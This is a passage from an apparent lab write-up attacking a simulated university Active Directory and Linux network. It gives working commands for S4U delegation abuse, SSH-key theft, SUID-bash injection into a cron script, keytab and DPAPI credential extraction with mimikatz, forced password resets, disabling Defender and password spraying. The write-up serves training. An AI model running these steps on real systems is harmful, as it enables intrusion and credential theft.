eazypassword (svc_webmonitor)
1g 0:00:00:00 DONE (2026-08-24 13:38) 100.0g/s 500500p/s 500500c/s 500500C/s taniafaye..sexcluff
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$

4b. svc_files constrained delegation → S4U → FILES

svc_files (kerberoasted earlier) carries TRUSTED_TO_AUTH_FOR_DELEGATION and msDS-AllowedToDelegateTo: HOST/FILES - classic constrained delegation with protocol transition (KCD):

1
2
3
$ bloodyAD -H DC.westbridge.hsm -d westbridge.hsm -u svc_files -k get object svc_files
msDS-AllowedToDelegateTo: HOST/FILES; HOST/FILES.westbridge.hsm
userAccountControl: NORMAL_ACCOUNT; DONT_EXPIRE_PASSWORD; TRUSTED_TO_AUTH_FOR_DELEGATION

BloodHound - svc_files → AllowedToDelegate → FILES (constrained delegation):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ impacket-getST -k -no-pass -spn 'HOST/FILES.westbridge.hsm' -impersonate Administrator -altservice cifs/FILES.westbridge.hsm 'WESTBRIDGE.HSM/svc_files'
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Changing service from HOST/FILES.westbridge.hsm@WESTBRIDGE.HSM to cifs/FILES.westbridge.hsm@WESTBRIDGE.HSM
[*] Saving ticket in Administrator@cifs_FILES.westbridge.hsm@WESTBRIDGE.HSM.ccache
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ export KRB5CCNAME=./Administrator@cifs_FILES.westbridge.hsm@WESTBRIDGE.HSM.ccache
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ impacket-smbclient -k -no-pass FILES.westbridge.hsm
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

Type help for list of commands
# use C$
# cd Users\Administrator\Desktop
# get flag.txt
# exit
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ cat flag.txt
Flag02[FILE_*****]
1
Flag02[FILE_*****]

With the ticket loaded, we authenticate to the CIFS service on FILES as Administrator.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ impacket-smbclient -k -no-pass FILES.westbridge.hsm
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

Type help for list of commands
# shares
ADMIN$
C$
IPC$
IT-Share
Scripts
Students
# use IT-Share
# ls
drw-rw-rw- 0 Wed Jul 15 13:13:32 2026 .
drw-rw-rw- 0 Sun Jul 26 10:47:29 2026 ..
drw-rw-rw- 0 Sat Jul 4 05:56:59 2026 Backup
drw-rw-rw- 0 Tue Jul 7 11:08:40 2026 Deployment
drw-rw-rw- 0 Tue Jul 7 17:09:58 2026 Documentation
# cd Backup
# ls
drw-rw-rw- 0 Sat Jul 4 05:56:59 2026 .
drw-rw-rw- 0 Wed Jul 15 13:13:32 2026 ..
drw-rw-rw- 0 Sun Jul 12 08:09:27 2026 WEB
# cd web
# ls
drw-rw-rw- 0 Sun Jul 12 08:09:27 2026 .
drw-rw-rw- 0 Sat Jul 4 05:56:59 2026 ..
-rw-rw-rw- 419 Sun Jul 12 08:09:27 2026 id_ed25519
-rw-rw-rw- 107 Sat Jul 4 05:59:19 2026 id_ed25519.pub
drw-rw-rw- 0 Sat Jul 4 06:02:00 2026 www
# get id_ed25519.pub
# get id_ed25519
# exit
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$

The IT-Share\Backup\WEB folder also holds an id_ed25519 private key for svc_web:

1
2
3
4
5
# use IT-Share
# cd Backup\WEB
# ls
id_ed25519 id_ed25519.pub www
# get id_ed25519

Phase 5 - WEB (Linux): writable backup script → root

SSH in with the stolen key:

1
2
3
4
5
6
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ nxc ssh 10.0.10.10 -u svc_web@westbridge.hsm -p '' --key-file id_ed25519
SSH 10.0.10.10 22 10.0.10.10 [*] SSH-2.0-OpenSSH_9.6p1 Ubuntu-3ubuntu13.18
SSH 10.0.10.10 22 10.0.10.10 [+] svc_web@westbridge.hsm: (keyfile: id_ed25519) Linux - Shell access!
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ ssh -i id_ed25519 -o IdentitiesOnly=yes 'svc_web@westbridge.hsm'@10.0.10.10

/opt/web_backup/web_backup.sh is world-writable and runs on a schedule as e.mitchell (of web backup maintainers). Append a SUID-bash stinger and wait for the next run:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ ssh -i id_ed25519 -o IdentitiesOnly=yes -o StrictHostKeyChecking=no -o KexAlgorithms=curve25519-sha256 -l 'svc_web@westbridge.hsm' 10.0.10.10
Welcome to Ubuntu 24.04.4 LTS (GNU/Linux 7.0.0-1010-aws x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro

System information as of Mon Aug 24 18:46:09 UTC 2026

System load: 0.0 Temperature: -273.1 C
Usage of /: 8.0% of 47.39GB Processes: 130
Memory usage: 16% Users logged in: 0
Swap usage: 0% IPv4 address for ens5: 10.0.10.10

* Ubuntu Pro delivers the most comprehensive open source security and
compliance features.

https://ubuntu.com/aws/pro

Expanded Security Maintenance for Applications is not enabled.

16 updates can be applied immediately.
To see these additional updates run: apt list --upgradable

3 additional security updates can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm


Last login: Mon Aug 24 18:46:10 2026 from 10.0.30.4
svc_web@westbridge.hsm@web:~$

svc_web@westbridge.hsm@web:~$ cd /opt/
svc_web@westbridge.hsm@web:/opt$ ls
web_backup
svc_web@westbridge.hsm@web:/opt$ cd web_backup/
svc_web@westbridge.hsm@web:/opt/web_backup$ ls
web_backup.sh
svc_web@westbridge.hsm@web:/opt/web_backup$ cat web_backup.sh
#!/bin/bash
set -euo pipefail

SRC="/var/www/html"
DEST="/var/backups/web"
BACKUP="${DEST}/web_latest.tar.gz"

mkdir -p "$DEST"

tar -czf "$BACKUP" -C "$SRC" .

chmod 640 "$BACKUP"
svc_web@westbridge.hsm@web:/opt/web_backup$

svc_web@westbridge.hsm@web:/opt/web_backup$ echo 'cp /bin/bash /tmp/bash && chmod 4777 /tmp/bash' >> /opt/web_backup/web_backup.sh
svc_web@westbridge.hsm@web:/opt/web_backup$ cat web_backup.sh
#!/bin/bash
set -euo pipefail

SRC="/var/www/html"
DEST="/var/backups/web"
BACKUP="${DEST}/web_latest.tar.gz"

mkdir -p "$DEST"

tar -czf "$BACKUP" -C "$SRC" .

chmod 640 "$BACKUP"
cp /bin/bash /tmp/bash && chmod 4777 /tmp/bash
svc_web@westbridge.hsm@web:/opt/web_backup$
svc_web@westbridge.hsm@web:~$ cd /tmp/
svc_web@westbridge.hsm@web:/tmp$ ls
snap-private-tmp systemd-private-9b67af164b014b699278a1c7349e88a4-chrony.service-YR9mG8 systemd-private-9b67af164b014b699278a1c7349e88a4-systemd-logind.service-CHEQhJ
systemd-private-9b67af164b014b699278a1c7349e88a4-ModemManager.service-UYC4mZ systemd-private-9b67af164b014b699278a1c7349e88a4-fwupd.service-ixT1tV systemd-private-9b67af164b014b699278a1c7349e88a4-systemd-resolved.service-EfjTt6
systemd-private-9b67af164b014b699278a1c7349e88a4-apache2.service-6EJ9mY systemd-private-9b67af164b014b699278a1c7349e88a4-polkit.service-h5Foy5
svc_web@westbridge.hsm@web:/tmp$
svc_web@westbridge.hsm@web:/opt/web_backup$ ls /tmp/
bash systemd-private-352e30cee67a42639afa68c706011c26-apache2.service-CQg3zS systemd-private-352e30cee67a42639afa68c706011c26-systemd-logind.service-flWKIK
snap-private-tmp systemd-private-352e30cee67a42639afa68c706011c26-chrony.service-LuteOR systemd-private-352e30cee67a42639afa68c706011c26-systemd-resolved.service-b7ZpPf
systemd-private-352e30cee67a42639afa68c706011c26-ModemManager.service-AHQ2JA systemd-private-352e30cee67a42639afa68c706011c26-polkit.service-eqVNjT
svc_web@westbridge.hsm@web:/opt/web_backup$
svc_web@westbridge.hsm@web:/opt/web_backup$ /tmp/bash -p
bash-5.2$ id
uid=337209506(svc_web@westbridge.hsm) gid=337200513(domain users@westbridge.hsm) euid=1001(e.mitchell) groups=337200513(domain users@westbridge.hsm),337209505(web backup maintainers@westbridge.hsm)
bash-5.2$ id
uid=337209506(svc_web@westbridge.hsm) gid=337200513(domain users@westbridge.hsm) euid=1001(e.mitchell) groups=337200513(domain users@westbridge.hsm),337209505(web backup maintainers@westbridge.hsm)
bash-5.2$ whoami
e.mitchell
bash-5.2$

bash-5.2$ mkdir -p /home/e.mitchell/.ssh && chmod 700 /home/e.mitchell/.ssh
bash-5.2$ cd .ssh/
bash-5.2$ ls
bash-5.2$ echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEC8n7uosDPsBUbTa2J+a1O4bDhO7TRTP7q9g+9H364v kali@kali' > authorized_keys
bash-5.2$ chmod 600 authorized_keys
bash-5.2$

Added our public key to e.mitchell and we logged in to ssh using e.mitchell
As e.mitchell, the student-portal users.json holds bcrypt hashes; one cracks to Password123 for d.reynolds, who has full sudo:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ ssh -i ~/.ssh/id_ed25519 -o IdentitiesOnly=yes -o StrictHostKeyChecking=no -o KexAlgorithms=curve25519-sha256 e.mitchell@10.0.10.10
Welcome to Ubuntu 24.04.4 LTS (GNU/Linux 7.0.0-1009-aws x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro

System information as of Mon Aug 24 19:25:00 UTC 2026

System load: 0.0 Temperature: -273.1 C
Usage of /: 7.8% of 47.39GB Processes: 133
Memory usage: 16% Users logged in: 1
Swap usage: 0% IPv4 address for ens5: 10.0.10.10

* Ubuntu Pro delivers the most comprehensive open source security and
compliance features.

https://ubuntu.com/aws/pro

Expanded Security Maintenance for Applications is not enabled.

35 updates can be applied immediately.
21 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

3 additional security updates can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm


The list of available updates is more than a week old.
To check for new updates run: sudo apt update


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

e.mitchell@web:~$

e.mitchell@web:~$ cd /var/www/data/studentportal/
e.mitchell@web:/var/www/data/studentportal$ ls
users.json
e.mitchell@web:/var/www/data/studentportal$ ls -lah
total 24K
drwxr-s--- 2 www-data studentportaladmins 4.0K Jul 27 18:17 .
drwxr-xr-x 3 www-data www-data 4.0K Jul 14 16:07 ..
-rw-r--r-- 1 www-data www-data 13K Jul 27 18:17 users.json
e.mitchell@web:/var/www/data/studentportal$ pwd
/var/www/data/studentportal
e.mitchell@web:/var/www/data/studentportal$
e.mitchell@web:/var/www/data/studentportal$ grep -iar pass
users.json: "password": "$2y$10$mRCQxe\/f5AEhuyi1sZKoyuOCfUeAroZ\/dDhOgrUcrGCRxqRpfnRRi",
users.json: "password": "$2y$10$8wNlBZIztDGBJztJhBPa\/uEV840u0jYjDxF7zH0BJ3HRlzbKrcZjW",
users.json: "password": "$2y$10$RGQ0z9GX.ZcrGHkGlgf9XOlc.ubkqbpx1l.D7s0.4ArqcRSQ\/Eu2C",
users.json: "password": "$2y$10$zTzuHd4RAdqEkm6.NvaXi.mDvBc29DSMItP8kZWi868H3iUDbAC7.",
users.json: "password": "$2y$10$QCVYL2rECuJ2uVYAKMg06uO3iChZBKEznAtD.ngTECjIfdBdNQT6a",
e.mitchell@web:/var/www/data/studentportal$
e.mitchell@web:/var/www/data/studentportal$ cat users.json | jq
{
"d.reynolds@westbridge.hsm": {
"fullName": "d.reynolds",
"email": "d.reynolds@westbridge.hsm",
"studentId": "WB-2026-999",
"program": "Business \r\n Administration",
"password": "$2y$10$mRCQxe/f5AEhuyi1sZKoyuOCfUeAroZ/dDhOgrUcrGCRxqRpfnRRi",
"registeredAt": "2026-07-27T16:11:26+00:00",
"status": "Active",
"accountType": "Staff,Administrators",
"courses": [
{
"code": "CS 301",
"name": "Algorithms and Data Structures",
"credits": 3,
"grade": "A",
"progress": 85
},


┌──(sebin㉿Sebin-PC)-[~]
└─$ hashcat -m 3200 ss_hashes word
hashcat (v7.1.2) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #01: cpu-skylake-avx512-11th Gen Intel(R) Core(TM) i5-11400H @ 2.70GHz, 4868/9737 MB (2048 MB allocatable), 12MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72
Minimum salt length supported by kernel: 0
Maximum salt length supported by kernel: 256

Hashes: 5 digests; 5 unique digests, 5 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory allocated for this attack: 512 MB (10295 MB free)

Dictionary cache built:
* Filename..: word
* Passwords.: 5005
* Bytes.....: 49056
* Keyspace..: 5005
* Runtime...: 0 secs

[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit =>
$2y$10$mRCQxe/f5AEhuyi1sZKoyuOCfUeAroZ/dDhOgrUcrGCRxqRpfnRRi:Password123
[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit =>

e.mitchell@web:~$ su d.reynolds
Password:
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

d.reynolds@web:/home/e.mitchell$ cd
d.reynolds@web:~$ ls
d.reynolds@web:~$ sudo -l
[sudo] password for d.reynolds:
Matching Defaults entries for d.reynolds on web:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User d.reynolds may run the following commands on web:
(ALL : ALL) ALL
d.reynolds@web:~$ sudo su
root@web:/home/d.reynolds# cd
root@web:~# ls
flag.txt snap
root@web:~# cat flag.txt
Flag03[WEB_*****]

root@web:~#
1
Flag03[WEB_*****]

From root we grab the machine keytabs - /etc/krb5.keytab (WEB$), /etc/svc_krb_t2.keytab - and extract svc_krb_t2‘s AES256 key, which is enough to getTGT for it:

1
2
3
4
5
root@web:~# file /etc/krb5.keytab
/etc/krb5.keytab: Kerberos Keytab file, realm=WESTBRIDGE.HSM, principal=WEB$/, type=92757, date=Wed Oct 7 21:34:56 1970, kvno=23
root@web:~# cp /etc/krb5.keytab /tmp/krb5.keytab
root@web:~# chmod 644 /tmp/krb5.keytab
root@web:~#

/etc/krb5.keytab only gave hash of WEB$, after doing some enumeration I got other keytab files also.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
root@web:~# find / -name *.keytab 2>/dev/null
/tmp/krb5.keytab
/etc/apache2/supportportal.keytab
/etc/svc_krb_t2.keytab
/etc/krb5.keytab
root@web:~#
root@web:~# cp /etc/apache2/supportportal.keytab /etc/svc_krb_t2.keytab /etc/krb5.keytab /tmp/
root@web:~# chmod 644 "/tmp/*.keytab"
root@web:~#
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ scp -i ~/.ssh/id_ed25519 -o IdentitiesOnly=yes -o StrictHostKeyChecking=no e.mitchell@10.0.10.10:/tmp/supportportal.keytab ./supportportal.keytab
supportportal.keytab 100% 1912 2.6KB/s 00:00
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ scp -i ~/.ssh/id_ed25519 -o IdentitiesOnly=yes -o StrictHostKeyChecking=no e.mitchell@10.0.10.10:/tmp/svc_krb_t2.keytab ./svc_krb_t2.keytab
svc_krb_t2.keytab 100% 81 0.1KB/s 00:00
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ python3 keytab_extract.py supportportal.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
REALM : WESTBRIDGE.HSM
SERVICE PRINCIPAL : WEB$/
NTLM HASH : 5e7a57b17ebc35b3750e898852ece7a4
AES-256 HASH : 2a607c9d8ac8a3b3ee51b4f32cf29f7f534e750e537847dfde6d8b9169c9c5cd
AES-128 HASH : 0a8d6936fc9fdbc9d8e3ceaf320da0bc
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ python3 keytab_extract.py svc_krb_t2.keytab
[!] No RC4-HMAC located. Unable to extract NTLM hashes.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[!] Unable to identify any AES128-CTS-HMAC-SHA1 hashes.
[+] Keytab File successfully imported.
REALM : WESTBRIDGE.HSM
SERVICE PRINCIPAL : svc_krb_t2/
AES-256 HASH : 00280b95458c5a279cc4555cec5f0f404a0ff2f0551c155b44ab402bca775a54
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ impacket-getTGT -aesKey 00280b95458c5a279cc4555cec5f0f404a0ff2f0551c155b44ab402bca775a54 westbridge.hsm/svc_krb_t2
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in svc_krb_t2.ccache
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ export KRB5CCNAME=svc_krb_t2.ccache
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$

Phase 6 - HELPDESK-WS: tiered OU walk → local admin

svc_krb_t2‘s get writable shows GenericAll-equivalent rights over OU=IT Tier2. We grant ourselves control, then reset s.harrison (who lives in that OU):

BloodHound: HelpDesk Workstation Admins = { S.HARRISON } → s.harrison is local admin on HELPDESK-WS. (A logonHours tweak cleared a time restriction first.)

1
2
3
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ bloodyAD -i 10.0.10.5 --host DC.westbridge.hsm -d westbridge.hsm -u svc_krb_t2 -f aes -p 00280b95458c5a279cc4555cec5f0f404a0ff2f0551c155b44ab402bca775a54 -k add genericAll 'OU=IT Tier2,DC=westbridge,DC=hsm' svc_krb_t2
[+] svc_krb_t2 has now GenericAll on OU=IT Tier2,DC=westbridge,DC=hsm

1
2
3
4
Using `GenericAll` permissions over the `IT TIER 2` OU, we changed the password of `s.harisson` within the same OU.
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ bloodyAD -i 10.0.10.5 --host DC.westbridge.hsm -d westbridge.hsm -u svc_krb_t2 -f aes -p 00280b95458c5a279cc4555cec5f0f404a0ff2f0551c155b44ab402bca775a54 -k -s set password s.harrison 'Pass123456'
[+] Password changed successfully!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
Changed the logon hours of `s.harrison` to allow RDP access to the `FILES` machine
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ VAL=$(python3 -c "import base64;print(base64.b64encode(b'\xff'*21).decode())")

┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ echo "$VAL"
////////////////////////////

┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ bloodyAD -i 10.0.10.5 --host DC.westbridge.hsm -d westbridge.hsm -u svc_krb_t2 -f aes -p 00280b95458c5a279cc4555cec5f0f404a0ff2f0551c155b44ab402bca775a54 -k set object s.harrison logonHours -v "$VAL" --raw --b64
[+] s.harrison's logonHours has been updated
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ nxc rdp 10.0.10.15 -u s.harrison -p Pass123456
RDP 10.0.10.15 3389 FILES [*] Windows 10 or Windows Server 2016 Build 26100 (name:FILES) (domain:westbridge.hsm) (nla:True)
RDP 10.0.10.15 3389 FILES [+] westbridge.hsm\s.harrison:Pass123456
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ nxc rdp 10.0.10.25 -u s.harrison -p Pass123456
RDP 10.0.10.25 3389 HELPDESK-WS [*] Windows 10 or Windows Server 2016 Build 26100 (name:HELPDESK-WS) (domain:westbridge.hsm) (nla:True)
RDP 10.0.10.25 3389 HELPDESK-WS [+] westbridge.hsm\s.harrison:Pass123456 (Pwn3d!)
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$

After RDP’ing in, disabling Defender, and creating a local hacker admin, Mimikatz dumps the box:

1
Flag04[HELPDESK_*****]

RDPed into the FILES machine using the newly created administrator account and dumpes hashes.

1
2
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ xfreerdp3 /v:10.0.10.25 /u:hacker /p:'Pass123456' /cert:ignore /dynamic-resolution +clipboard

DPAPI loot → a sprayable password

s.harrison has a DPAPI-protected credential. Decrypt the masterkey (domain-backup key via RPC), then the blob:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
PS C:\Users\hacker> Get-ChildItem C:\Users -Recurse -Force -Filter '8d556e4a-b824-4d6e-8ebf-99584b7b3b6c' -ErrorAction SilentlyContinue | Select FullName

FullName
--------
C:\Users\s.harrison\AppData\Roaming\Microsoft\Protect\S-1-5-21-1978613116-3728955385-531918137-1107\8d556e4a-b824-4d6e-8ebf-99584b7b3b6c

PS C:\Users\hacker> runas /netonly /user:westbridge.hsm\s.harrison C:\Temp\mimikatz.exe
Enter the password for westbridge.hsm\s.harrison:
Attempting to start C:\Temp\mimikatz.exe as user "westbridge.hsm\s.harrison" ...
PS C:\Users\hacker>


.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # dpapi::masterkey /in:"C:\Users\s.harrison\AppData\Roaming\Microsoft\Protect\S-1-5-21-1978613116-3728955385-531918137-1107\8d556e4a-b824-4d6e-8ebf-99584b7b3b6c" /sid:S-1-5-21-1978613116-3728955385-531918137-1107 /rpc
**MASTERKEYS**
dwVersion : 00000002 - 2
szGuid : {8d556e4a-b824-4d6e-8ebf-99584b7b3b6c}
dwFlags : 00000000 - 0
dwMasterKeyLen : 000000b0 - 176
dwBackupKeyLen : 00000090 - 144
dwCredHistLen : 00000000 - 0
dwDomainKeyLen : 000001ac - 428
[masterkey]
**MASTERKEY**
dwVersion : 00000002 - 2
salt : fd32ed733cc9f1afb33e9f3b18b14173
rounds : 00001f40 - 8000
algHash : 0000800e - 32782 (CALG_SHA_512)
algCrypt : 00006610 - 26128 (CALG_AES_256)
pbKey : 6dfdadb8d3c5e448efd70d1b858860ee70dad75afba0c27ecc5e6af6e2d6a7fc133098d5c810a0bdf6dfb71a478e06771dce5ed6a5528adb2b0a8fd05be8452d7f8ec56cad2f064b356d8d9cfa0eca94746c7aa4ee500609d8325d6a24b5685a2af30d49c8d37de08eea7ff13a5c702ce5682c97350a85bcac84660c4005743af7658093b4f60f2ec7d628fdf34fc760

[backupkey]
**MASTERKEY**
dwVersion : 00000002 - 2
salt : 162c008d5769af24e83620819ab1d4a0
rounds : 00001f40 - 8000
algHash : 0000800e - 32782 (CALG_SHA_512)
algCrypt : 00006610 - 26128 (CALG_AES_256)
pbKey : 052f00b2ddd0284e70299be8b293b93e43d19496d0997ee02944cf24f0340f7e063269a3f4ad0ebd0c924b115e919d08d9230cda6da277ec96b51e3e82c1610385abca383f764d7a6befa3821a1b8e0ffbed8a2e6e9216f535fc8c6081f7280f6089ddf6c7eae04fd9412e54edebe2d5

[domainkey]
**DOMAINKEY**
dwVersion : 00000003 - 3
dwSecretLen : 00000100 - 256
dwAccesscheckLen : 00000090 - 144
guidMasterKey : {2f34dd28-ccf5-45dc-910e-5e5ba3a5f44b}
pbSecret : a3d312e6f9bc0d7ca2be7c71b61b642f463cb40b3a2402f64e0a3e944d1d32e8e7d6b7583b5cd6eb82bcbe377d421ef23fbde9b23de6766604dfc71c384ffab5b68b789c50bd654227be56c2bedb25584b434306707d43d92b878183e2b803169ca27f3fe119e5275f5a93fc450ee0ba8a9fe5a2dfdeb38159b6cc4fb1e811d537687452bb5d2cddee3ddc6943bbdf5a042fea8758b4d09f91f3dddabf985d715453ca7535a848c6fb723bddfd00daac98a4b7fd7dc6b78f70d380cf71dde4eb43df6e1134f3708b650c4356a662cbd133a153c0a22b11ed9ba2363d19e3751676853e00180068ae70fcfff20307d2cb8b2ec12f71b16674da6777eaccd76409
pbAccesscheck : f50ec95e4fff5becf188f692f36508fd2676d042ae8cd223d1e8e8c5ea08d79cf3db6431a83bcdc8d873bdd021319c459d71e80090d646ffc9066d707ec19d0868749b9c1dab91c472b99bc8021d038af2fc659562375ea130aaacba7960a5d417cafd776500f7022c9ca89cbf667dd33d51bb84de006bda96e9e2e1a3f4218674b39aab14f64c65bb6744a9bebf896a



[backupkey] without DPAPI_SYSTEM:
key : 74c7660cb7119d35eaf228e10109a18e88feaa0570abe807b9fe4cb27c25a073
sha1: 455f7242abd65e5f11e82d5ab5fc25f729c36a6d

[domainkey] with RPC
[DC] 'westbridge.hsm' will be the domain
[DC] 'DC.westbridge.hsm' will be the DC server
key : 89067ddd84629fe6ebba7842f89af147530d177d055e8b0cbc27cb168c0281904288b5ac3de894a28f4f485c21b8fd4e0128486e40dfb1910a396fa256128ff0
sha1: be4292485130ed3019efcaf87605c864ae7e72ad

mimikatz # dpapi::blob /in:C:\Temp\blob.bin /unprotect
**BLOB**
dwVersion : 00000001 - 1
guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
dwMasterKeyVersion : 00000001 - 1
guidMasterKey : {8d556e4a-b824-4d6e-8ebf-99584b7b3b6c}
dwFlags : 00000000 - 0 ()
dwDescriptionLen : 00000002 - 2
szDescription :
algCrypt : 00006610 - 26128 (CALG_AES_256)
dwAlgCryptLen : 00000100 - 256
dwSaltLen : 00000020 - 32
pbSalt : 761ba7c084a30f81b16e6b4a03ab3787d2ed0de1f9abaab26a6261449b7aa49b
dwHmacKeyLen : 00000000 - 0
pbHmackKey :
algHash : 0000800e - 32782 (CALG_SHA_512)
dwAlgHashLen : 00000200 - 512
dwHmac2KeyLen : 00000020 - 32
pbHmack2Key : 3241c8ecf8c79efdfd37f84009af80c67d68dfab4faf5edef68d41570681817a
dwDataLen : 00000030 - 48
pbData : eafef4f2d095ab18c559c7f9b04e2d0bef88fa6a03daa14956f2daf07575955ae675254eab726fc9be10c49ad8fad5ab
dwSignLen : 00000040 - 64
pbSign : dc450aa4f887f925cc97cb7e20cfc4f71d1f0641ae7a749cc98fa9ae54d4e82f95a31c06cfafe2df2c176eca5644d26f77e2a0e4219763b20db2d519ac353c78

* using CryptUnprotectData API
* volatile cache: GUID:{8d556e4a-b824-4d6e-8ebf-99584b7b3b6c};KeyHash:be4292485130ed3019efcaf87605c864ae7e72ad;Key:available
description :
data: Welcome2Westbridge!

mimikatz #

After performing a mimikatz dump, we obtained DPAPI-protected credentials and successfully recovered one plaintext password:

Welcome2Westbridge!


Phase 7 - DC: deleted-object restore → shadow creds → ADCS

Spraying Welcome2Westbridge! hits a.pherson (with STATUS_PASSWORD_MUST_CHANGE, fixed via impacket-changepasswd). a.pherson holds WRITE over CN=Deleted Objects - so we can restore tombstoned accounts and take them over with shadow credentials:

1
2
3
4
5
6
7
8
9
10
11
12
